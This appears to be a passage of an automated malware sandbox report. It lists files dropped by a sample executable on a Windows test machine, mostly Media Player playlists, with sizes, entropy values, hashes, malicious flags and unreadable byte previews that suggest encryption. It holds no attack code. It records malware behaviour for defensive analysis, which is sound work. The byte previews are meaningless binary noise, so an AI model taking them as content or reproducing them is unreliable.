                                                                                                                                                                                                    SSDEEP:48:bM2TTzX/Xu7EkmKsEzV6GkFAReUQIww7s3TZD:IozXfQEZKsEZ61Fw3wX3TR
                                                                                                                                                                                                    MD5:BBE322FBF74E0FFDE6F6B0777EC6220D
                                                                                                                                                                                                    SHA1:34A8B3DDE5109BB7B5AC238C573B0D2C014CFB95
                                                                                                                                                                                                    SHA-256:B4CBD4B4A164571D9E5CC5464D2074BDE9568DEF8726A1E8CD8D05E1FCA53FE8
                                                                                                                                                                                                    SHA-512:C4EA550CF292A4336F69AADCAF0918F4AF0F0C042A4B6F6F68AE75DDD2DEA4D6B0F48297D8CE027F37551C6D0DA47FB6A765EC328BA29CAFE661D92AF6C5E09D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .6B.(_..|...G.B..G..Q....-%.S...v...Bb...VW...u..%...'i..?...m.'bxAt.M..B[.g....."9.n....-..!.B.(...a.R...]N....I.....ZU(.^ ....Y.....+.W.n0...Q.... ...hu.y.5I.....G....e.kw.D...P"..O....p.7.o..B......e..#L^.."...PG.r.b.v.(...|..m...%....M.... .ehpu....":...x<."...)>...e1...Y`'.P.P.:t...u....Kw.w.b{Rz....@.....wW...[h......~f.w.:...=wF..#..=f.r.C.B.4.+&......%...V.S.o{..o....C..8i.[.i....c..D)...,...s|.......A6..#............<.\.(.EU(.......s....#..........5....}....z....?...c*..'!$.L.o.?..@....R...A.C1...3L..EZ.2'S2..>.....4..sf.vG.......|..T.......F+...........*&M....@..Ff..:.E.2........!.....y.c.{.D....u.{ik-..k..R..{.......e..LuohT.<.]..._..R:9`K...S)..:..d9N.....o.{..E..H|J......'5..@..?.|..4uwL.??l....~+..LV]...j...`.......:..+..+q-.......;... .............N.byc=....!X.....3b.3.q.......;..U.a..v`x;&..:^.1.8'+.>.M.....yd.....1.9.a...F.R.^z ....2..u..Q.........4....!>...U......Ki...2".t$T.... ..C9.u...n..*.".z%.J..:..-.w..........)...]..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\ynfz0jx\imagestore.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):22981
                                                                                                                                                                                                    Entropy (8bit):7.991582782116739
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:384:QXmPPv6uzNJjPDHuujJS6GQpCOiNCf1VI3JGQIDBJ3+TMUY1inA6gHbtpH+ic5uQ:Y036+NJjSbWxiG7DL3xURgHppHfguJu
                                                                                                                                                                                                    MD5:27D04DC0B9FCD41F7FC98B118E5D30D2
                                                                                                                                                                                                    SHA1:635A3163916112CA88AA794617AAB43B82B2FD0D
                                                                                                                                                                                                    SHA-256:1C58E78C31B2F992589852CE4BD2C18CFA1A33DACD28BF7883E16F614EB7A771
                                                                                                                                                                                                    SHA-512:2C57A5532E2C5DF958EDD1A3FDF4199A875184F723D0B8CEAA8C5415B8EE7D637DA9C5B4D38FC3F3E31F419A1C4627943F967B0F0478C8ADD6F43E813A0A48F7
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: *J.^(.-...6l.L...E..&U..8.T.x........E\.,...p1M..E..}....#B\...X.I..\.s.......5.Z....p.$.i..%4.p!@.gc.:..}...k..?.5ZI.0.=.4O.@..QzP.7.^......{2?..:\ c..Y.Zm/.....M.r.d..M..I.k..=.X5..1.<..1.k6.....v...Ll..$.X.......(..vW<7Z.p.,.B.!......q....b$/...VL.L.N.h.7...R.......3....m..g.2.T..%..8.X..x..M..... .....~.3.[..a..%.<.'$*.N.&..=g....j..\.'.{w..#..........p=.S.......P.`...T.h.,..s.b.../._...B..=~.....'.....).v.......ArvJ.Z:{...r......z..#n.5....m.d...gu.vk..3N..9...v.v.w..77c...qH2..3...B.......$......6..n..-....h+R6..........#D}D...c.8...|......X.|.l...V..)-...{..4..SUGP.Wef..9...AR......V.;.z.f...<34..\...........,K w..K_-....z..&.|...h...&"a.j..QZ...'j..f....f.9.d..&+.g.W.U.<.>.T.w....N"7.....<Kj,.....b...wH.z....A I.p,...p..b.ol....$....T..>.Q.....".2..l.W.}{!........A<W..{.A..=...`..g.....x..0k...!+..K.B.K.v~......lb$7..J...l.B)p.....S@.&.T...9.$|UM.......K.H).=A......\............L..tU..}c^.W........2...l....=.@.YM.;....9..V..\5.....O
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00053139\01_Music_auto_rated_at_5_stars.wpl
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1373
                                                                                                                                                                                                    Entropy (8bit):7.848154162434231
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:hlVoFOSQj4bQsusLEQ9WtfUp0QT4nZMALG9motFLo3v86bD:h1suAExtfUp0LL90N4D
                                                                                                                                                                                                    MD5:1B11FBC6B19F833AA2416AC53E028AB0
                                                                                                                                                                                                    SHA1:C09722832F1E1ADF3E9DDF212ECB6D8B466BA2BA
                                                                                                                                                                                                    SHA-256:EC03847226ECD0455DCF49BBADF1871DBC233FB3ED962EC990B55BD30F9AA585
                                                                                                                                                                                                    SHA-512:09E7FEB444AE9B8819BCFDC88F8CF045FAE05EED3D6896AA67523A6AD45A6181D9E4C3E64BCDEFEF7A8E8BB5E50D9784B9E10ADD53D6F7FAA94B894A684702E2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .,x...h..Z..-%...J...n...;...Y.o..),.L6Q(.n..........GT%]7O..:.Z...q...|.^...O.....^..@V..C..+.J.:v.s..<..v31R....7"#6K\..O...o.o...H.b...`..j...\..tQ!..L...q...h.I.....i..7....&.ro...[.=..'.....f[.......P../&\._...$D@.1+Ku.N.=...v.#3.W.x.....6.....^P.....[.D...#b......2F..Lrb.....2.:...kbn......]..z.{FAi....G6.3..`z..c....i .p.~.Yv..x.b....~w.._.#Q;O^Vu.._....;y.S..(5j%.5.".u.:C*..........0P...`.r-.p..j....m.T.".u.....O.C..yP...L.4.:...b./....a..F........).SB.....,.3.a).....F+{.x.y_...W{...o)q...*...U..>.M.9hiE.UX..b..>i.a.^..Vp._..zI.F{.+......-N.j................F>.fJ..z...5E@..#.e&..zO|..cH..+...h2GKK~..A*.[.AV=.)..(B.....U.f.......@z.K..}Vw.'.........Y. .7g.....Qyy.E....._Wy].{UM.ss.8.....x4>.k}NV..O..sn.+.9...A...u.b:.8ab .J.L..U..7e>...L.......f...%.#..Yp.....D.d.X..rP..t...;.g~.....V.vi..&^!..LvAET......h.l.L.D...g/..<.v{..0.{.5....$5.|..^e..|..5.,.n.9.......V3]/U'...SQ.i.W.....Se.n}.,.2..Q.7.<.e.Aq..r.V..W#..D.g7.1A.....,
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00053139\02_Music_added_in_the_last_month.wpl
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1608
                                                                                                                                                                                                    Entropy (8bit):7.866629398335384
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:56B7JJHEPAcZgAKyfUVMHBRyYaWGfvaMI6S1LJmnB4P3OxXIuMt5wfiM2GpA6CXn:56lJUgzyLRyyGfSUMUB4PeDMkqYfC73D
                                                                                                                                                                                                    MD5:4A571B335AB8596ABF143042AEA3F9CB
                                                                                                                                                                                                    SHA1:9592D371E23DF393FB63C0629A2D7EEA262855EA
                                                                                                                                                                                                    SHA-256:38BABF6C9060F1A57557E19C81B466591955EBC1003A2FC3ED13CE611D97D9AA
                                                                                                                                                                                                    SHA-512:B97E31AD862FBAE6E38C04A9C191B7BDA12DC243E8BA5D0F1B55E62A7B4850ACCB616C10532AE9EC61D31400DABCB3C62D86BAACBDDB86FCE0353DDA815DFA29
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ]..n/X.n....<,..%.o.....I|C....TTY.CgF...7.....sY...Z.c.if.P0P..^.l42P.\..!.....X...6..#.'....r8S.....ja..Y<./...N.....'.>PL,G.K.W^+.........<k...RY].L;]Tl.+.....L.@..E.....K,...}nQK..e.7..>]?.%..a.0.@...jlzM..wJ\Im..%U.[...?!l^Ke.+yfQw..N.2..m5.zf/..$^..x.!]M....6........o.x...I.WaV.....Ior.$..U...)N..........z-.....L.)T..'..*J.....y.*...vB..2c)..h'*.,.....=...n.~....XNZ..F.[....>..S.m1P..:.kg...-..".H..x..g.O(.p..E.S.z1-.......zJ.../'.........:Eh.....J.W.Q..&z.%:.B.....$..f.4..F.O...c.L........A..y6"......FK...J.p..........+.P..(b..&.....%..?..-.m.@P.s..d....ki..|...4...../m.k*V.f|.....`.B.*..agDO.Y.B....w.. ...._&p...mC.fZ......%.d....9..qJ./..i........7.5...p..N.f.P6qfi.uy~.:.......J.....<...W....E._....|............q4E.M.$.(k..r$2.......xF.:....#...}.DJ..3..*..E#.B=.$....G..6.d]9d...#.Z.P..C.QNBU....[...B.j.T.H ;........Q...7.m...t.Ma...G..Sc......-!...@'z...4.>...JJ............lr..!..d..e.i..}M.c.\...Qu...Y..l.M..&@...t..c=.r.-
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00053139\03_Music_rated_at_4_or_5_stars.wpl
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1596
                                                                                                                                                                                                    Entropy (8bit):7.893327190554182
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:d2nTrGgfEaS4E3ghmICseAXMKR9OTGW18ryK6D:eruF1gOAXt4GW1xB
                                                                                                                                                                                                    MD5:8393F54CC289C8149EE537B6A1035B45
                                                                                                                                                                                                    SHA1:009A2E16B3B42C1B9A11223D3E6457ABE7C27C90
                                                                                                                                                                                                    SHA-256:8EFE6B0C2B3E4D3801B09022C7D3C9CDCEECB4DAB729FD07094402201CB35541
                                                                                                                                                                                                    SHA-512:01C4BB28E5B2CE4A76A96F99717C2D3FB00200FEF2B98384599AE593F439F5B98BE9F74342DD8A275897B68CCBDF9ED207A4142D2D2F14412490879E5BC00353
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...n...?....q.jg.._].....%$.Z..>Z...%...E.8.M....ewBS..,...C...S...$..........<.....w..BQ.f`Sqm...@..$... H^......1..s..._......^m).-..bL..E.._i.&)..^...6......@ ...{T..3.....JvjW.%H.>|.:.x...-..ZDz.H9k#[.o/;to..t.<.&....C........a ._....fh...%..F.....d..R.b.....H..;........|.)!.Qz..3.=B.'..,..'...}9R./....W>.v.\..h(..r..$7..C.Z.B....{hgD.......gm......Y...9....VL.S..w..Dd.._..Bz....t.).... m.]..D......r+qTw..L.....+.....r..o!i..^...<n....."..V.SG...q.0..F.>4..*f.ao.]H.n.w..%.%..C.5N*.bX...1.i..>!.=|...c....&z(...G....Gk...w.x.A.`6.,....]...nzs.S...?./vbD9 ...,.j..gr..$.......a.Ox.ab....2..]3\....1..D....-..l px...qf{O...F..4W....`Y!.R.e.....p.....nx..b].)..&.y....wt.<_..L.~{A!.s.].6..S.s........+9".3......Iv...pV......)..qQ.z...*M.(#e..hk.'...E0.n-.N\..F.[..v"..N...C..'.].t....OL.<n`wO.c....>T.W7...._......Q...|...........5......D8...zH..-....i.........@\`~...L.d.H@...I...TP..$I4.Ul....N... ..p..T.."k...H.e!..."$.Up.4y.q}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00053139\04_Music_played_in_the_last_month.wpl
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1613
                                                                                                                                                                                                    Entropy (8bit):7.859255166225126
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:fs+xLHs2rkdBBtR7yAYOr9ROj1o6eoee9X8rYrQNdD:Fx7s2QLndFh9ROUodNgR
                                                                                                                                                                                                    MD5:B28BE03A78644359FC4E4C14C03ECE1E
                                                                                                                                                                                                    SHA1:7952A4C3E84A67807E59FA6CC1EB31E7451777EF
                                                                                                                                                                                                    SHA-256:98C91CF7F2D04791EEB0DAD8E7FFDB9CC3C020584C57FBB7D69E44A7DE0DD381
                                                                                                                                                                                                    SHA-512:CC299381BAB23D20F3BFBF1946E29DE4639827F221EF9CD09716E43B985221FE22AEC0020BB80DFB00C469D7964F1D0D22142C7511E49F78E3CBACEE1D8AD0C2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: {.:....y...!I.e..q.j(....D.>I).o5..f..o[ ..+.:%0..Lc._.K_....$.o..i.aKh..t....Q.v.&.Z..f[..o...(.!.@..:Z..O..XI.).@sBf&.L3..5.DA....b%U.....0m.d./..f..}g.........@.W+..?.oC.P.....0.4..2...".%...T.wn....%.g..<..plw...U.z........F.s7...k.eN..)q..4.K.Y:...g~...t...=U.H.ER'E..i`x=.....A.x.&9.C..S..`..&b*.q[.....!.v<.v.......^.R.P~>..y.....e...W..;.pIV.c.o....Q..$......}U.3..ww.C....|#7...F.CWY\<H...A.e...Gv..)..... }|.f....H.....C.....^]|.......M.-.7.....).G......-I&N..uv........z.5;..7ll.Q.~...+.Ir...=.*nPU.qo......~...sr.....[......I.B.....-pgN>+....V..N)Q....>6.Y.'....".t...<.q...J...0..mT,.w..O.../B.l.....L..r).%...m.0.a.kID.[.,u?/...}.....h..Z).(.Wm....v.y.....u.5..]...5.....U..x...Qz.1..>.*.U..,.I.;.v.S.H...$N....y....!.|.......=..r.3.....v/.I.^.3d./"-&a....G..a.Jm..}..DD....*8......G...H.2(....CYQ1U._...xm&%..VU.).$.D.;.v.....F.N(..H...D..%... .g.I.o@#........s..f.....<...;.M.~.Qh....6&...G.0..6aG.....}dM%$|{...o./p...O.!.>.D&[..s....f...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00053139\05_Pictures_taken_in_the_last_month.wpl
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1126
                                                                                                                                                                                                    Entropy (8bit):7.793102175022104
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:TZ7iS/X4/LfQZx2fD4VNt6XbsAX1FrrzGJYoObD:Vi27OD26LPX1FSsD
                                                                                                                                                                                                    MD5:CC875FF7C6D1FACD439454E5768378E6
                                                                                                                                                                                                    SHA1:69D453D0E58DBD99ED3A3C27D52BA2248ECF8A29
                                                                                                                                                                                                    SHA-256:09F427886FE879816B9012EE4D5B1D1778073BEAC466488149B1C990604B86E2
                                                                                                                                                                                                    SHA-512:F4716C7955215D84F80C3D182EB33706A386DE88C36D4B8D662F09B395885CEAB5D01604DD9A3B6B2457FA7CB7E275D31D42736EA4066636376B749DDB11842F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..)W8b.6t.U..P...".._v.g.h..>.].qn.v^....U....^.#....(.L./T.W.h......,....9.v..2WD. O....W.:.W5p.p.....7..<L..k.J1.5xPR.sz.(.D.^.%...4S9.6....X.`,.S8"...z......5.....'./..!....ky 7..e_...s..2s..G.3.z4.......]$...9....E......P..;...EV.......5....J.G9....g...P.z>5......c.......9.....b.....Eg. &..+.T.KXF`|I<.F...L...@..I..........i...Y...}oRh0U..:.....v)A.O.%.....24.u.1.TN.....EZf.<..v.)P.z"..N.J....Iqzf9PEOo.........p.Q..x.y..|.Q..........!.*-.0R...|...(.....=......D..........b".<'.........n.....S,.C.o.[b...h.-7oy..D...9[N....~..j.....p.K..Z..xsH...z.%1jAL....^.G..n%...Xn....".&O..a.v`T...+>Q.~x.-.....PWsB.....5...Wk2.....b=.....%+T..oA...L....g<..-!...~m..:.6..5_.'..<........\u....G.9....|.............B.....3W1+%.1.._.|P.u.....`.%.N.G..e.tL..t.X.......@.l......m........~.8-....o=.V...uE.."6...[...3..c/......-.).Jc.../.!lZ......p.j..u.[.6...........4d..z>9y|..g....j7...?m......*|...e.;...{g.YX.d..b..<.lT..g.z...Wl...6.F.X.E..'...c..D3..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00053139\06_Pictures_rated_4_or_5_stars.wpl
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1114
                                                                                                                                                                                                    Entropy (8bit):7.808599251954539
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:mJfggJCGpXf4Xpd1Fe1D1fK9fxPUXFrv2uWnLH/EaHZEa2bD:yfdZ14ZxeD1S9fxPUXVvKAa5FkD
                                                                                                                                                                                                    MD5:51CF8C39D1885B8432EF4E7041349833
                                                                                                                                                                                                    SHA1:76B0BA6268E02F0214BC888F97B3170189629684
                                                                                                                                                                                                    SHA-256:5ADC9746929F4FE954D20ADA2C3959013EB989068C168F7BC5DF1CC664DDCE04
                                                                                                                                                                                                    SHA-512:41BD1A02C2F62829B542FE8FFFFFB313A8E23C51C923E9C1B091406D28F295CEBF861F00F7CDC27B046AEABBF3E190EF5F40B7E1CAEE907C3F339F6EE763E6B8
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .e`...nva.. ~F.C..[X...bJ...Q...V.B..=.p,.JP.JEU=y.y.b.}:A...J}..w..iA.pp.f{.0i..f..Z I$..F.A.....j{..KQ.i7..+,@h.."....o..-*..T%J..$C.d....;..f_.*xl.E.A....By.vy.!.Dcf.4. GI.. I....W.$....Cu.....i...9..k.&..M........3M. .&..m.s{`.xnQ.....-_H....^A#W..k(g.y.....}."...(.ODE.:...Bzc...I^uz}..d..U..\.g^dw.7r...j..Y...U....e.:..U...7K..kX.^.S..%.V..n.A.O....Qb{..z......-._..|....H..W..:.._...37l.Z.01.b/..."L.N.`A>.z1.e.x]4....W..v..G.u..5h.EBT...).........9qk.V5...%.>|?0.;|.8....T..'..1....l...rl...R..@.!.EG.D.[."xdH..|4..0.3.../....]...x.....^b..._.[OFy.iN.`p..Z..+../..V.\....]. ..]K.e..o...?.OM.y.`y.m..n\.n..UCHb..q.<.|-n..U.d$..."..A........-....L-[.r.$......8?.n.m..6.(..L.6SR9.O.L..;..}..T..G...vv.U .|*8.._....X..=L,R....v.5B...);_.M.......F.a...9...$....Vj;..UY.A..3r.`O..u!<.%.kA.....j]..R..x....,s...Ao...wB.V.....g)./...5-..Q...k..l....+!U.....J.5..y....;......"..&...S...[1.4.|..N...D.!Y.g..@.A.u.ub+.Z5.....#a.;VSYs...3..b.}.I..09....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00053139\07_TV_recorded_in_the_last_week.wpl
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1369
                                                                                                                                                                                                    Entropy (8bit):7.853887922691596
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:Da+4ThbF8jQQrW/3nwTUUnohYiTbyWR4/B3TrfULKZM6bD:O+UbajEACuIiTrfUSD
                                                                                                                                                                                                    MD5:C646339A7F7C672D45A6DB61349614CF
                                                                                                                                                                                                    SHA1:A74D9A3D4F16E6E3F6CFFE7A91AF0E4E7E942C2B
                                                                                                                                                                                                    SHA-256:E85F1EA2F1BFA2FB8363B1178C6EB1D94AE4F61B94483677FB20C69B942025D4
                                                                                                                                                                                                    SHA-512:810B2157754A993ED48F974BDF22FFA853EE4C75EA449F5504A2780CF14FC45FA63066E2521BACCBDFBDEFF28C16CE914CD8FB58F0D29E7D2841D7FDCC9200D7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .....0.k...d.....`.v.I.A...;...m...)...N.t...=n...i,%..x.....2.2..."...T|y.....H........a....u..5.3+..^a`a.!...a..?.z._.......c=vH.....>.+<|.p.B....$?.I..b.c...#+..'Z.T!...0J.bI.../4....}......*.`p..3.... .T.._..0<1......~m..T...G...\...e.t....8.b..%../Nns1.V..B3.f~...Ec....|.K3..4n9f...?..........+.~.;.{...3#..NAZ.\.H3..=L'=?.}...@E\....sx.59c.]Y...n6k.y.64..['....3.X......Z...x...r.&.....T....V{..[....'0.\..w.51..]#...J.8d.Td.ww.{Z.z..W......h....~..I.J.lS...fb....i......Nlr.\..~...M..t.d..G ..4=..1K....R&........<.%F..3C.x....R0%S...T..*k...sEO|.f....4.^.;.;..P.9zM...vM.n....._.w.......X.g..M..".....r.......6....ly.i......b.R.)k...T0..)...[.....()^.lA.F.....l..'....D.X....E..1.....u.H%...-\...2E..x(.k.k..'naNA{@&Cy.....39.t..p.B*.....?Sa..OeW.T.....@.....Kj...>.k.v.....'$....N...m.X.0..v.......NM....&^.n.e.?a.......u...\...5{.Ng.._.\./.....n@....z.|.V...l.;7......$X.P.3z. F..iU.x.a.......x.+..[>.x@<Z..o.}......kv...g..| .I...E8]4.}h.L.E.c...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00053139\08_Video_rated_at_4_or_5_stars.wpl
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1349
                                                                                                                                                                                                    Entropy (8bit):7.816814356977846
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:/3lnwSH5StdwbdGqPimTcsxaJ2czm+JBG6u36q9sDpNqtlkSUbd+w4FC4bD:/VnRSvwbUq54sxaJJzVkr3xkpNqtelxq
                                                                                                                                                                                                    MD5:2EA32FF67ADAED027146623DFEC5894E
                                                                                                                                                                                                    SHA1:BB243EEF12E324E4B69BE96506300FFC74A05A46
                                                                                                                                                                                                    SHA-256:5C04CA193E62088ED4A37487062BF180D3DF34C5F951D99F075D6637970114DA
                                                                                                                                                                                                    SHA-512:B93DA7D8CC3B3877D1B87D7905E553E9B2E9599C29B3399BC4CF4FA74512E0C741CD82B981AC3EF5599D70BD8B2C79ABE6C1D7E33E52D4E5604E0FB8E4FD4569
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: W....z.M.=....y...Q.R........H..MG.....[>..DzuP..%W..V..sT..zj.N+a..wAx.2.(..&.ZC...9=.uI..fa..d._....|$ P0}u...2%k..UkF.#....)P2:...R]=a.l...P..fI...@..z.d.Jh.g..~.O.....R...qK'.eM7...h..mj.s5'>....d......)...RJ.......b.:.9.B.=.8.'C.SN#.c..5)....k9{..0..5gD.v...B;1..>#x.B.<......0.......c2...q.}E.q.t...|.'..cs..f$...B...b......{.7.'..u............3...t.'LV.C...Y~6.^.J!...tP.j+...-.5......A.^....P.P...r.r..&;P.p.`\.I...}...xN.p..sT...'y[...+....M.>.E..b...V.....1....=_ZLs..U....<f{..up.....D.v..{...z$...3...-..{!f.....svp..W.F.[......L.S.Md.e....j.8..^.n...hEz)$=..F]..zd.n...R.A..bE...W..V.A..Y..d`.].......|.k!...].M.V.|B......%...r..;..3..............D....s+l...`...`.K......d.X...Uw.R.EvR/.8.rE....s.x6......`@l..^4...B....Ml+..k...f...O<W.nx.].....~{.B...q....3.:..X..5.....Y{._.^.lp})^c.n..A{0.vz..3.*.54.o..1....*.g....q.4*B5|6.....Dr.vn5.$fuo...w.u._....38n2.yV5..B4lf.._.R-.V.?._..%{..............`..w'<o...Na.... ..W.......(.s..%..x.:
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00053139\09_Music_played_the_most.wpl
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1354
                                                                                                                                                                                                    Entropy (8bit):7.836533207645063
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:rQ2bZK3+G0/SVbbGQu+ui4K3Ta/GRaw5EA0MhmlGjtwEvHfEpNtpe1XNbD:R03Ii6B+u9Ku/Gkw5vfgGZwEv670VtD
                                                                                                                                                                                                    MD5:5682B2EA01B178E743B2C51CF46C60C1
                                                                                                                                                                                                    SHA1:367B9AE0F4D78A242A8D68861DF581B0C7847755
                                                                                                                                                                                                    SHA-256:52A0CEB4F89EB5E9EC9D2C00A0E4A78296A55933E322B186BB8CFB2552FD94B0
                                                                                                                                                                                                    SHA-512:6FA7DFB8925201EE40AC28FE36F51353167218D6626D58513262974F1C92EA29E0EFA5391CD62F37C71EE42965B5200614C3FB26739BCB32D7BA84FA7AB811D0
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .I!e:...{v<.....i..h;'.x...!w.. D...:<..~N.P.8.Z......h....4....N\...L3NK.h...z[MzI..d.c....o^V".....s........18x....f..).i......k..f...P..Dmp....C.w.p.......6.8.D.H.@.K.=0.......\...........w..4.F...R...7?Yh.0....{.. nf...}`6b.4Ir...T0.Q.[#V.}.w{..\..Sbz...y..:s.B#.P......(....o.S....d..}[>.h....D.V.[.Qs......."I...sR..%.F.).r,!S..B,..l.P.?..h..1%..[..i..Le......r9K..}:.ta67....E.0.o2.gLE.,...E.....T.\.jTr.2.0P.5h.v...D4....\...R....W{.!..;.."q.V<..l....;.U=S/K[.I.H0.a..!.n.AO.R.....o/8H...1..:5.q......+..`.....L..m.N..b..f.(>.(......Bc...:..V...V..7...6R.#..7.1."..N\...P.L?6P.......3.l..^.oD..P..;...r..S7V..........~X.:.......J.|.. ..Y\a+...\n......rzZ%......h.7....G?...T(..d.u[.;Llh.....zBr...)..t...'...a....v#........r.tAi..8...[......q.L.2.K.....3g~q...~m.Y.8Wg...c..%.|.,.o.G..g..Lj6.........*....;B^.v.....O..v..H.<..+.c.S..'$..mQ.|.D.i..''...%?.}8.0..I...K".Y....a1...w.5...H.%..|.G}0..vt...\~.!.I........+E.l.}|.X....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00053139\10_All_Music.wpl
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1392
                                                                                                                                                                                                    Entropy (8bit):7.833484378926407
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:xe/IFGQLy7jUQDqCHtVWwa3Oo4z0secp1hv5tcgIc53a/Q+peoUbD:8/OGQLy7jUWqCSw8O3AsecXhr93aJpfG
                                                                                                                                                                                                    MD5:F27F4D66D6DBF4F8648E5AAE4AE69EFD
                                                                                                                                                                                                    SHA1:F93E8EE8A07754B223C1E2A127D0507FB2AFAC52
                                                                                                                                                                                                    SHA-256:8DFDB7D0CA156D7A8A3BD7D2AC51D9BD0305ACFAA4560F0486724F7D66E58C24
                                                                                                                                                                                                    SHA-512:778D0775A753C2FCF3ECAF5B5D6AE13FD7AE0AEEC03DF86B806BDB3A8D9A4FC1BB3267939A2EF715D1B5FE6C933028C7DFCBB589311786C76D0909B6E53CC34C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
